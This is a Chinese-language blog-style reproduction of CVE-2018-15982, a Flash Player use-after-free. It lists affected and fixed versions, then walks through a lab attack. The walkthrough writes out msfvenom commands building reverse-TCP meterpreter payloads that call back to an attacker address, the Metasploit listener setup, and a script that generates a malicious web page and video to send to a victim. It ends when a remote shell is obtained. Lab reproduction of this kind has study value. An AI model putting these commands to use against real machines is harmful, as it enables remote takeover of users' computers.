作者:歐根
漏洞信息:CVE-2018-15982
Adobe已發布適用於Windows,macOS,Linux和Chrome OS的Adobe Flash Player安全更新。這些更新解決一個 關鍵的 Adobe Flash Player的漏洞和一個 重要的 Adobe Flash Player的安裝程序的漏洞。成功利用可能導致當前用戶的上下文中的任意代碼執行和權限提升。
CVSSV3分數和漏洞類型:
受CVE-2018-15982影響的產品
產品 |
版 |
平台 |
Adobe Flash Player桌面運行時 |
31.0.0.153及更早版本 |
Windows,macOS和Linux |
適用於Google Chrome的Adobe Flash Player |
31.0.0.153及更早版本 |
Windows,macOS,Linux和Chrome OS |
適用於Microsoft Edge和Internet Explorer 11的Adobe Flash Player |
31.0.0.153及更早版本 |
Windows 10和8.1和win7/其他版本為測試 |
Adobe Flash Player安裝程序 |
08.0.0.108及更早版本 |
視窗 |
漏洞危害:
漏洞類別 |
漏洞影響 |
嚴重 |
CVE編號 |
免費使用 |
任意代碼執行 |
危急 |
CVE-2018-15982 |
修復方法:對adb flash進行升級
產品 |
版 |
平台 |
優先 |
可用性 |
Adobe Flash Player桌面運行時 |
32.0.0.101 |
Windows,macOS |
1 |
|
適用於Google Chrome的Adobe Flash Player |
32.0.0.101 |
Windows,macOS,Linux和Chrome OS |
1 |
|
適用於Microsoft Edge和Internet Explorer 11的Adobe Flash Player |
32.0.0.101 |
Windows 10和8.1 |
1 |
|
Adobe Flash Player桌面運行時 |
32.0.0.101 |
Linux的 |
3 |
|
Adobe Flash Player安裝程序 |
31.0.0.122 |
視窗 |
2 |
實驗環境
攻擊機:kali 2.0
受害機:win7 win10
使用工具
CVE-2018-0802_CVE-2017-11882-master exp
Msfconsole
1.創建payload程序
msfvenom -p windows/meterpreter/reverse_tcp_rc4 RC4PASSWORD=zale LPORT=6666 LHOST=192.168.0.111 -f raw>86.bin
msfvenom -p windows/meterpreter/reverse_tcp_rc4 RC4PASSWORD=zale LPORT=6666 LHOST=192.168.0.111 -f raw>64.bin
這里會生成兩個bin文件,分別為86bin和64bin估計是32位平台和64位平台
監聽payload
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp_rc4
SET LPORT 6666
set LHOST 192.168.0.111
set RC4PASSWORD zale
生成文件視頻文件和網頁
python CVE_2018_15982.py -i 86.bin -I 64.bin
調用py文件,生成攻擊網頁和視頻文件
開啟apache服務
把上面生成的網頁和視頻放在web目錄中
發給受害機驗證是否成功
當受害者點擊網頁時
可用清楚看到已經成功返回shell
至此漏洞復現結束!